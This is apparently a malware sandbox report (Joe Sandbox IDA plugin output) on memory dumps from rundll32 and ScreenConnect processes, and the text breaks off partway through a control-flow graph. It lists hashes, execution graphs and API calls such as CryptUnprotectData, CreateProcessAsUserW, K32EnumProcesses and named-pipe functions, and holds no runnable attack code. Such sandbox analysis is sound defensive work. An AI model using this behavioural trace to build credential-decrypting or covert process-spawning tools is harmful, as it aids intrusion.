                                                                • API String ID:
                                                                • Opcode ID: fbfa98eeb11f18cf4883b376d572c1a0ec5e1a2adbdbabb8539d9b8e84dbb00f
                                                                • Instruction ID: bee8f972245d9fb9ec87571ef363df6636724fcf9fa4b62595b588d495a87ce8
                                                                • Opcode Fuzzy Hash: fbfa98eeb11f18cf4883b376d572c1a0ec5e1a2adbdbabb8539d9b8e84dbb00f
                                                                • Instruction Fuzzy Hash: 53C080F7775D446FF31105045CCB5E37B30F6712043898155C040D4017E11AF0578175
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42aa6008f56ef44602b3a125f8cfa24841ae7aa5a262736f64f45de02c9691e1
                                                                • Instruction ID: e21c24f1a82d586ba35eba7553e2ac162f8605c787de586800b98ee2a4a99c6b
                                                                • Opcode Fuzzy Hash: 42aa6008f56ef44602b3a125f8cfa24841ae7aa5a262736f64f45de02c9691e1
                                                                • Instruction Fuzzy Hash: 4BC04C36241018BBDF452E91A4189EA7F26EF59362F508025FA5985260DA354920AB50

                                                                Execution Graph

                                                                Execution Coverage:12.5%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:11.9%
                                                                Total number of Nodes:101
                                                                Total number of Limit Nodes:9
                                                                execution_graph 39352 56b1be8 39355 56b1814 39352->39355 39356 56b1eb8 ConnectNamedPipe 39355->39356 39358 56b1f48 39356->39358 39358->39358 39359 3e016f8 39360 3e01740 CryptProtectData 39359->39360 39361 3e0173a 39359->39361 39362 3e01783 39360->39362 39361->39360 39363 56b0040 39364 56b0071 39363->39364 39372 56b0bc2 39364->39372 39365 56b00c7 39366 56b0207 39365->39366 39379 56b1480 39365->39379 39383 56b1470 39365->39383 39387 56b27fe 39366->39387 39367 56b0a4e 39367->39367 39373 56b0bf4 39372->39373 39375 56b0c3c 39373->39375 39395 51a5e98 39373->39395 39403 51a5e39 39373->39403 39412 51a5ea8 39373->39412 39374 56b0ccc 39375->39365 39380 56b148f 39379->39380 39455 56b15a7 39380->39455 39384 56b148f 39383->39384 39386 56b15a7 2 API calls 39384->39386 39385 56b14a4 39385->39366 39386->39385 39388 56b281e 39387->39388 39390 56b2837 39388->39390 39468 56b2950 39388->39468 39472 56b2960 39388->39472 39389 56b2860 39393 56b2960 WaitNamedPipeW 39389->39393 39394 56b2950 WaitNamedPipeW 39389->39394 39390->39367 39393->39390 39394->39390 39397 51a5ea8 39395->39397 39396 51a5ecc 39398 51a5ed5 39396->39398 39399 51a6430 4 API calls 39396->39399 39400 51a6421 4 API calls 39396->39400 39397->39396 39420 51a6430 39397->39420 39427 51a6421 39397->39427 39398->39374 39399->39396 39400->39396 39404 51a5e42 39403->39404 39406 51a5e95 39403->39406 39404->39374 39405 51a5ed5 39405->39374 39407 51a5ecc 39406->39407 39410 51a6430 4 API calls 39406->39410 39411 51a6421 4 API calls 39406->39411 39407->39405 39408 51a6430 4 API calls 39407->39408 39409 51a6421 4 API calls 39407->39409 39408->39407 39409->39407 39410->39407 39411->39407 39414 51a5ecc 39412->39414 39415 51a5edc 39412->39415 39413 51a5ed5 39413->39374 39414->39413 39416 51a6430 4 API calls 39414->39416 39417 51a6421 4 API calls 39414->39417 39418 51a6430 4 API calls 39415->39418 39419 51a6421 4 API calls 39415->39419 39416->39414 39417->39414 39418->39414 39419->39414 39422 51a6455 39420->39422 39424 51a6465 39420->39424 39421 51a645e 39421->39396 39422->39421 39448 51a6050 39422->39448 39434 51a65b0 39424->39434 39441 51a65a1 39424->39441 39429 51a6430 39427->39429 39428 51a6455 39430 51a645e 39428->39430 39431 51a6050 ProcessIdToSessionId 39428->39431 39429->39428 39432 51a65b0 2 API calls 39429->39432 39433 51a65a1 2 API calls 39429->39433 39430->39396 39431->39428 39432->39428 39433->39428 39437 51a65da 39434->39437 39440 51a65c7 39434->39440 39435 51a65d0 39435->39422 39436 51a6742 K32EnumProcesses 39438 51a677a 39436->39438 39437->39440 39451 51a605c 39437->39451 39438->39422 39440->39435 39440->39436 39444 51a65b0 39441->39444 39442 51a65d0 39442->39422 39443 51a6742 K32EnumProcesses 39445 51a677a 39443->39445 39446 51a605c K32EnumProcesses 39444->39446 39447 51a65c7 39444->39447 39445->39422 39446->39444 39447->39442 39447->39443 39449 51a67e0 ProcessIdToSessionId 39448->39449 39450 51a6853 39449->39450 39450->39422 39452 51a66f0 K32EnumProcesses 39451->39452 39454 51a677a 39452->39454 39454->39437 39456 56b15e3 39455->39456 39460 56b25b8 39456->39460 39464 56b25c0 39456->39464 39457 56b16b1 39462 56b25c0 CreateProcessAsUserW 39460->39462 39463 56b26a4 39462->39463 39463->39457 39465 56b2613 CreateProcessAsUserW 39464->39465 39467 56b26a4 39465->39467 39467->39457 39471 56b2960 39468->39471 39470 56b29a4 39470->39389 39471->39470 39476 56b1934 39471->39476 39473 56b296d 39472->39473 39474 56b1934 WaitNamedPipeW 39473->39474 39475 56b29a4 39473->39475 39474->39473 39475->39389 39477 56b29c8 WaitNamedPipeW 39476->39477 39479 56b2a44 39477->39479 39479->39471

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 804 56b25c0-56b2611 805 56b261c-56b2620 804->805 806 56b2613-56b2619 804->806 807 56b2628-56b263d 805->807 808 56b2622-56b2625 805->808 806->805 809 56b264b-56b26a2 CreateProcessAsUserW 807->809 810 56b263f-56b2648 807->810 808->807 811 56b26ab-56b26d3 809->811 812 56b26a4-56b26aa 809->812 810->809 812->811
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 056B268F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 3ddeb26167b457859310c80ffc791e6537c69f34384237bb7dda32d4f47794b0
                                                                • Instruction ID: b90c3cf6d96253ff38f283e675fc62ddb18b4bdc5c0088b3a3650c8ebb700307
                                                                • Opcode Fuzzy Hash: 3ddeb26167b457859310c80ffc791e6537c69f34384237bb7dda32d4f47794b0
                                                                • Instruction Fuzzy Hash: B8412276900249DFDB10CFA9C884ADEBBF1FF48310F14842AE958A7250D775A995CF90
                                                                APIs
                                                                • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03E0176E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2911876146.0000000003E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_3e00000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataProtect
                                                                • String ID:
                                                                • API String ID: 3091777813-0
                                                                • Opcode ID: 811170aa4d3ec260958d84869b4c49bf2f27e62fe1df412f9f88f26b68ed92ed
                                                                • Instruction ID: 7616f1e70eea190c7a2f7cd3a7668041bb2bd710bdab7e6c18293299e588edc5
                                                                • Opcode Fuzzy Hash: 811170aa4d3ec260958d84869b4c49bf2f27e62fe1df412f9f88f26b68ed92ed
                                                                • Instruction Fuzzy Hash: 1D2137B6800249DFCF10CF9AC844ADEBBF1FF88310F14852AE914AB250D3359555CFA1
                                                                APIs
                                                                • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03E0176E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2911876146.0000000003E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_3e00000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataProtect
                                                                • String ID:
                                                                • API String ID: 3091777813-0
                                                                • Opcode ID: a60123f7b98e7aa9b85fe57d76593392b528668a834af721b2cb9e147878c870
                                                                • Instruction ID: 5e2e13167a5c83c2e7d03f7ce0222b7b3a794741b34f673686536e7b939bdb1c
                                                                • Opcode Fuzzy Hash: a60123f7b98e7aa9b85fe57d76593392b528668a834af721b2cb9e147878c870
                                                                • Instruction Fuzzy Hash: 082104B68002499FCB10CF9AC844ADEFBF5FB88310F14852AE919A7250C339A595CFA1
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2E75
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: ba87a5857dc097dcedc3cb8ea218fec910a1d2f60c460a6be9ba5652f7ff37bb
                                                                • Instruction ID: 65748ef7b666e998a805e9b52b64daffb6e006f53c20fe964a8f04e1b2203d8d
                                                                • Opcode Fuzzy Hash: ba87a5857dc097dcedc3cb8ea218fec910a1d2f60c460a6be9ba5652f7ff37bb
                                                                • Instruction Fuzzy Hash: 182114B6800249DFCB10CF99C945BEEBBF4EB48320F148419E968A7251C339A595DFA5
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2E75
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: 31a07c9eb435f1585cd086b327e6ade06de0b2dc5709e8be5fab38169506424e
                                                                • Instruction ID: e0f2748748e65f6c1260b3ff86e3ca65505eb5f1d3e6d091866612f09ae92774
                                                                • Opcode Fuzzy Hash: 31a07c9eb435f1585cd086b327e6ade06de0b2dc5709e8be5fab38169506424e
                                                                • Instruction Fuzzy Hash: B32136B6800249DFCB11CF99C945BEEBBF4EF48320F148419EA54A7251C339A595CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2158b409db83232694581f1e5f4279a8823bd66876be895799c08cf07e5ada50
                                                                • Instruction ID: d390545a09c3d53a9a5919fd7a5de91d7df305aec13cbf9e36b67bb9204d4c24
                                                                • Opcode Fuzzy Hash: 2158b409db83232694581f1e5f4279a8823bd66876be895799c08cf07e5ada50
                                                                • Instruction Fuzzy Hash: 8F322B74A002158FDB18DF68D998A9DBBF2FF88314F1485A9D409EB355EB70AD85CF80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 759 51a65b0-51a65c5 760 51a65da-51a65e1 759->760 761 51a65c7-51a65ca 759->761 764 51a65e6-51a662a call 51a605c 760->764 762 51a65d0-51a65d9 761->762 763 51a6694-51a66a8 761->763 765 51a66aa 763->765 766 51a666e-51a6677 763->766 783 51a662f-51a6634 764->783 767 51a66b6-51a66bf 765->767 768 51a6679-51a6693 766->768 769 51a66d4-51a6736 766->769 775 51a6738-51a6740 769->775 776 51a6742-51a6778 K32EnumProcesses 769->776 775->776 777 51a677a-51a6780 776->777 778 51a6781-51a67a9 776->778 777->778 784 51a663a-51a663d 783->784 785 51a66c0-51a66cd 783->785 786 51a663f-51a666c 784->786 787 51a66ac-51a66b1 784->787 785->769 786->766 786->767 787->764
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26c6a3ef8b7fc41c012fedc1e79f5b4a6c9a24a5bcba3cf4774f243d0d1f1215
                                                                • Instruction ID: 06ffea6666242fd1ffc3692af340f366c02e875ae901cdf7abd2f4ee039776cf
                                                                • Opcode Fuzzy Hash: 26c6a3ef8b7fc41c012fedc1e79f5b4a6c9a24a5bcba3cf4774f243d0d1f1215
                                                                • Instruction Fuzzy Hash: 77519E76E006058FCB24CFA9D984AAEBBF1FF88310F14892DD06AD7651D734E845CBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 792 56b25b8-56b2611 794 56b261c-56b2620 792->794 795 56b2613-56b2619 792->795 796 56b2628-56b263d 794->796 797 56b2622-56b2625 794->797 795->794 798 56b264b-56b26a2 CreateProcessAsUserW 796->798 799 56b263f-56b2648 796->799 797->796 800 56b26ab-56b26d3 798->800 801 56b26a4-56b26aa 798->801 799->798 801->800
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 056B268F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 0f0203ebf1e6c69b440f29c5475d23e3bcde14a66a203d3eacbeb4a558eadd75
                                                                • Instruction ID: 4a97cf844d923c9d78c994793a4fb2bfd9187bc9ce022edf09fcd8440e36ef3e
                                                                • Opcode Fuzzy Hash: 0f0203ebf1e6c69b440f29c5475d23e3bcde14a66a203d3eacbeb4a558eadd75
                                                                • Instruction Fuzzy Hash: 2D412476900249EFDF10CFA9C884ADEBBF5FF48310F14842AE958A7250D775AA95CF90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 815 56b1ea0-56b1f46 ConnectNamedPipe 818 56b1f48-56b1f4e 815->818 819 56b1f4f-56b1f91 815->819 818->819 823 56b1f9b 819->823 824 56b1f93 819->824 825 56b1f9c 823->825 824->823 825->825
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 056B1F30
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: d232f85ac4d91ea4d966a8f5b34f182e4ee0db65fa5529aa54f6a067fab2ebe5
                                                                • Instruction ID: 1cd11462a94c59719045efe8e202a446354b7bdf8c54b27a32e3cfb063f5cd03
                                                                • Opcode Fuzzy Hash: d232f85ac4d91ea4d966a8f5b34f182e4ee0db65fa5529aa54f6a067fab2ebe5
                                                                • Instruction Fuzzy Hash: 583136B1D04258AFDB24CFAAC594BDEBFF4AF49300F14805AE849A7350DB74A942CF90
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 056B1F30
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 4630f6ffabb3dd5500b7d1c6b9596a41338053140d661e7f73ea37d591400c2c
                                                                • Instruction ID: e3c0cfd940e9a4c30f544d2449cbb499b9a334e17fa9c182ae6a206c33d1db67
                                                                • Opcode Fuzzy Hash: 4630f6ffabb3dd5500b7d1c6b9596a41338053140d661e7f73ea37d591400c2c
                                                                • Instruction Fuzzy Hash: 422106B0D04258EFDB24CF9AC594BDEBBF5AF49300F148069E809A7350DB759945CFA0
                                                                APIs
                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 051A6765
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: EnumProcesses
                                                                • String ID:
                                                                • API String ID: 84517404-0
                                                                • Opcode ID: 95cbcdbf38e77afd185c3568de995f2141baa11365e495ddeabaa21c744688f2
                                                                • Instruction ID: 4c9d7cd65eefa38f74775f016db8dbeac5cd2e02156a121cdb422d132598114d
                                                                • Opcode Fuzzy Hash: 95cbcdbf38e77afd185c3568de995f2141baa11365e495ddeabaa21c744688f2
                                                                • Instruction Fuzzy Hash: 082116B6D002499FDB15CF99C985BDEFBF4FB48310F14842DD519A7200C779A941CBA4
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,056B2986), ref: 056B2A2F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 8226769b2946b771acfbc6c1a06dcf934406bdb3a54a7f06aafd9b7cd4552bf8
                                                                • Instruction ID: 95bbdd50b13835a594c839b7fca9723829e037a56d23fdc88bfa08805c8506bb
                                                                • Opcode Fuzzy Hash: 8226769b2946b771acfbc6c1a06dcf934406bdb3a54a7f06aafd9b7cd4552bf8
                                                                • Instruction Fuzzy Hash: 5F2124B68002498FDB20CF9AC444BEEBBF4FB48320F14842DD859A7341C779A985CFA1
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,056B2986), ref: 056B2A2F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 5ca55cd739ef664af1ec1369a0694bb7d985257af75042c7613874173813e715
                                                                • Instruction ID: 8cbeeac15577cf1bf630d19fef8c38fd11bd69389c9d6c5fc70847c8ef00d0a0
                                                                • Opcode Fuzzy Hash: 5ca55cd739ef664af1ec1369a0694bb7d985257af75042c7613874173813e715
                                                                • Instruction Fuzzy Hash: 092115B68002498FDB20CF9AC444BDEBBF4FB88320F148469D869A7240C779A585CFA1
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 0abd8ebb1550a24f41cb2880839453123554da3d202372f42a20c5bfbb363bd5
                                                                • Instruction ID: 1971d35b868672dde41657552242a2c76f350c17206560bfde4c1a181fb3586d
                                                                • Opcode Fuzzy Hash: 0abd8ebb1550a24f41cb2880839453123554da3d202372f42a20c5bfbb363bd5
                                                                • Instruction Fuzzy Hash: A21103B6C002598FCB10CFAAC545BDEFBF4FB48324F148429D459A7241C378A545CFA1
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: a2c640128194cc63f20e7bc83d987ec2e024d684b77d3e70e269eed0bde08eb1
                                                                • Instruction ID: 89fbbe873444d86d4c0e682c272c17f3640375508e6c455ef7751e68ce57b7d0
                                                                • Opcode Fuzzy Hash: a2c640128194cc63f20e7bc83d987ec2e024d684b77d3e70e269eed0bde08eb1
                                                                • Instruction Fuzzy Hash: D91133B5C002498FCB20CF9AC4447EEFBF4FB48320F148429D469A7200C378A544CFA5
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 72825b3e94cae5f571cbed60ff989efc13291fdf2e3a013937e1c0b5c0b58352
                                                                • Instruction ID: 7b45107bf68e87d67875e47fd4ebcef19d70d0c7772e78e62fa0b37f03ad8a4b
                                                                • Opcode Fuzzy Hash: 72825b3e94cae5f571cbed60ff989efc13291fdf2e3a013937e1c0b5c0b58352
                                                                • Instruction Fuzzy Hash: 9F019A76C043098FDF11CF99C8097DEBBF4EF99328F188469D058A7292C739A44ACB61
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f99eca3d3ef50962a92c70537597836aed2e13e36dddbf1051fc86849cd368f
                                                                • Instruction ID: e3f2e18089c3f5e131a4a31d3341a0ddb225ba95bbeb2614e91b946a5eec9c61
                                                                • Opcode Fuzzy Hash: 8f99eca3d3ef50962a92c70537597836aed2e13e36dddbf1051fc86849cd368f
                                                                • Instruction Fuzzy Hash: 7A2125B5504280DFDF0ADF58E9C0B27BF65FBC8314F60C169E9090B25AC336D456CAA2
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: 9f29243ba7a0c0182f8e49c9fb0e8d5f3a4e3c6f76e4c939ced7bf67029864e8
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: 4011AF76504680CFDF16CF54D9C4B16BF72FB98324F24C6A9D9090B25AC336D45ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54474d5eb18b7307bb1782bc44064b7c9f0e95c99eee0e5af57db0767c25d68e
                                                                • Instruction ID: b5b79fbc3a935426a4c79b5c4be0fb5aae8e8f69f28ceae369ad509103ccfa17
                                                                • Opcode Fuzzy Hash: 54474d5eb18b7307bb1782bc44064b7c9f0e95c99eee0e5af57db0767c25d68e
                                                                • Instruction Fuzzy Hash: AB016D7100D3C09FD7164B259C94652BFB4EF43624F1984CBE9848F1A7C2695845CB71
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d5bb5013902a1bdcbc09ee976bf7b533ecb00e7fc8f205a5550dc01bd6febbc
                                                                • Instruction ID: 62f9456e8a3dfd27abc3cf20c584acfb6dccea3606a00dbecbe6d7ab48df812a
                                                                • Opcode Fuzzy Hash: 9d5bb5013902a1bdcbc09ee976bf7b533ecb00e7fc8f205a5550dc01bd6febbc
                                                                • Instruction Fuzzy Hash: CC012B314083409AEB194A69DD84767FF98EFC17A4F58C429ED080B18AC379D841CAB2
                                                                APIs
                                                                • RtlGetVersion.NTDLL(0000009C), ref: 01534DBE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905619270.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_1530000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID: `Q^q
                                                                • API String ID: 1889659487-1948671464
                                                                • Opcode ID: 803b368b0ff87959de50fbe009a9b11b74ee27734c4d3a618371f4b170c69746
                                                                • Instruction ID: 4d649290eb429fbb10a25fe641895b0b8d31f7ac1e40fc208e4f05ea2791c0b2
                                                                • Opcode Fuzzy Hash: 803b368b0ff87959de50fbe009a9b11b74ee27734c4d3a618371f4b170c69746
                                                                • Instruction Fuzzy Hash: 4E214571901668DFEB60DF59CC48B99FBB9FB44304F0085D9E50CA7240CB756A98CFA2

                                                                Execution Graph

                                                                Execution Coverage:12.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:37.5%
                                                                Total number of Nodes:8
                                                                Total number of Limit Nodes:1
                                                                execution_graph 14176 7ffd9b408014 14178 7ffd9b40801d 14176->14178 14177 7ffd9b408082 14178->14177 14179 7ffd9b4080f6 SetProcessMitigationPolicy 14178->14179 14180 7ffd9b408152 14179->14180 14172 7ffd9b403642 14173 7ffd9b425870 CreateNamedPipeW 14172->14173 14175 7ffd9b4259a3 14173->14175

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 41 7ffd9b716c80-7ffd9b716cb7 45 7ffd9b716cb8 41->45 46 7ffd9b716cb9-7ffd9b716cdc 41->46 45->46 46->45 49 7ffd9b716cde-7ffd9b716d27 46->49 54 7ffd9b716d28 49->54 55 7ffd9b716d29-7ffd9b716d4c 49->55 54->55 55->54 58 7ffd9b716d4e-7ffd9b716d6d 55->58 61 7ffd9b716d6f-7ffd9b716d7e 58->61 64 7ffd9b716d7f-7ffd9b716dae 61->64 69 7ffd9b716db1-7ffd9b716db6 64->69 70 7ffd9b716db7-7ffd9b716dd2 69->70 70->61 73 7ffd9b716dd4-7ffd9b716dd9 70->73 73->69 75 7ffd9b716ddb-7ffd9b716de2 73->75 75->64 76 7ffd9b716de4-7ffd9b716e1a 75->76 76->70 78 7ffd9b716e1c-7ffd9b716e2c 76->78 80 7ffd9b716e2e-7ffd9b716e4a 78->80 81 7ffd9b716e76-7ffd9b716e86 78->81 82 7ffd9b716e50-7ffd9b716e6e call 7ffd9b710c30 * 2 80->82 83 7ffd9b717258-7ffd9b717276 call 7ffd9b710c30 * 2 80->83 89 7ffd9b716e88-7ffd9b716e8a 81->89 90 7ffd9b716e8c-7ffd9b716e9a call 7ffd9b7100a8 81->90 99 7ffd9b7170ee-7ffd9b71710c call 7ffd9b710c30 * 2 82->99 100 7ffd9b716e74-7ffd9b716e75 82->100 101 7ffd9b717382-7ffd9b71738d 83->101 102 7ffd9b71727c-7ffd9b717283 83->102 93 7ffd9b716e9d-7ffd9b716eb2 89->93 90->93 103 7ffd9b716eb4-7ffd9b716eb6 93->103 104 7ffd9b716eb8-7ffd9b716edc call 7ffd9b716a10 * 2 93->104 123 7ffd9b71710e-7ffd9b717118 99->123 124 7ffd9b717136-7ffd9b717154 call 7ffd9b710c30 * 2 99->124 100->81 106 7ffd9b717285-7ffd9b717294 102->106 107 7ffd9b717296-7ffd9b717298 102->107 109 7ffd9b716edf-7ffd9b716ef4 103->109 104->109 106->107 115 7ffd9b71729a 106->115 108 